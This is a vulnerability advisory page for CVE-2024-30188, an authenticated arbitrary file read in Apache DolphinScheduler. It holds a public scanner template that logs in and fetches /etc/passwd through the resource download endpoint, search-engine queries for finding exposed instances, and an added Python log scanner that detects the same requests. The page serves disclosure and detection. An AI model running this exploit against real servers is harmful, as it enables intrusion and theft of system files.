CVE-2024-30188: Apache DolphinScheduler >= 3.1.0, < 3.2.2 Resource File Read And Write

Date: 2025-08-01 | Affected software: Apache DolphinScheduler | PoC: public

Vulnerability description

File read and write vulnerability in Apache DolphinScheduler: authenticated users can illegally access additional resource files. This issue affects Apache DolphinScheduler from 3.1.0 before 3.2.2.

PoC code [public]

id: CVE-2024-30188

info:
  name: Apache DolphinScheduler >= 3.1.0, < 3.2.2 Resource File Read And Write
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    File read and write vulnerability in Apache DolphinScheduler, authenticated users can illegally access additional resource files. This issue affects Apache DolphinScheduler from 3.1.0 before 3.2.2.
  reference:
    - https://github.com/advisories/GHSA-4vv4-crw4-8pcw
    - https://github.com/Mr-xn/Penetration_Testing_POC
    - https://nvd.nist.gov/vuln/detail/CVE-2024-30188
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 8.1
    cve-id: CVE-2024-30188
    epss-score: 0.80469
    epss-percentile: 0.99096
    cpe: cpe:2.3:a:apache:dolphinscheduler:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    verified: true
    vendor: apache
    product: dolphinscheduler
    shodan-query: http.title:"dolphinscheduler"
    fofa-query: title="dolphinscheduler"
    google-query: intitle:"dolphinscheduler"
  tags: cve,cve2024,dolphinscheduler,lfi,apache,authenticated

variables:
  username: "{{username}}"
  password: "{{password}}"

flow: http(1) && http(2)

http:
  - raw:
      - |-
        POST /dolphinscheduler/login HTTP/1.1
        Host: {{Hostname}}
        Connection: keep-alive
        Content-Type: application/x-www-form-urlencoded

        userName={{username}}&userPassword={{password}}&ssoLoginUrl=

    extractors:
      - type: json
        name: sessionId
        part: body
        json:
          - ".data.sessionId"
        internal: true

  - raw:
      - |
        GET /dolphinscheduler/resources/download?fullName=file:///etc/passwd  HTTP/1.1
        Host: {{Hostname}}
        sessionId: {{sessionId}}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: regex
        part: content_type
        regex:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 490a0046304402201af8ac3ac268ead63549b3d7f1daa4c7b5fb4324b4f237491e0228cda1c6a7b402203966bdfa408d13b7706f17728e72666748090d858d55505d34041a45b6674861:922c64590222798bb761d5b6d8e72950
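
A defender-side check for the request pattern in the template above, as an added example (not part of the original template or of the DolphinScheduler project): it scans access-log lines for `/dolphinscheduler/resources/download` requests whose `fullName` resolves outside the resource storage directory. The log format, the sample lines and the `RESOURCE_BASE` value are assumptions constructed for illustration.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

DOWNLOAD_PATH = "/dolphinscheduler/resources/download"  # endpoint from the template
RESOURCE_BASE = "/dolphinscheduler/resources"  # assumption: your storage root
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+)\s+HTTP/[\d.]+"')

# Constructed access-log lines (combined-log style), not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Aug/2025:10:00:01 +0000] "GET /dolphinscheduler/resources/download'
    '?fullName=file:/dolphinscheduler/resources/etl/job.sh HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Aug/2025:10:00:07 +0000] "GET /dolphinscheduler/resources/download'
    '?fullName=file:///etc/passwd HTTP/1.1" 200 1843',
    '10.0.0.9 - - [01/Aug/2025:10:00:09 +0000] "GET /dolphinscheduler/resources/download'
    '?fullName=file%253A%252F%252F%252Fetc%252Fhosts HTTP/1.1" 200 220',
    '10.0.0.7 - - [01/Aug/2025:10:00:12 +0000] "GET /dolphinscheduler/projects/list HTTP/1.1" 200 90',
]

def resource_path(full_name):
    """Normalized filesystem path that a fullName value points at."""
    value = full_name
    for _ in range(3):  # undo nested percent-encoding
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    parts = urlsplit(value)  # separates a file:/hdfs: style scheme and authority
    path = parts.path if parts.scheme else value
    return posixpath.normpath("/" + path.lstrip("/"))  # collapses ../ segments

def suspicious_requests(log_lines, base=RESOURCE_BASE):
    """Return (client, path) for download requests resolving outside `base`."""
    hits = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = urlsplit(match.group(1))
        if target.path.rstrip("/") != DOWNLOAD_PATH:
            continue
        for name in parse_qs(target.query).get("fullName", []):
            path = resource_path(name)
            if path != base and not path.startswith(base + "/"):
                hits.append((line.split()[0], path))
    return hits

if __name__ == "__main__":
    print(suspicious_requests(SAMPLE_LOG))
```

Set `RESOURCE_BASE` to the storage root actually configured for the deployment before running this over real logs.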
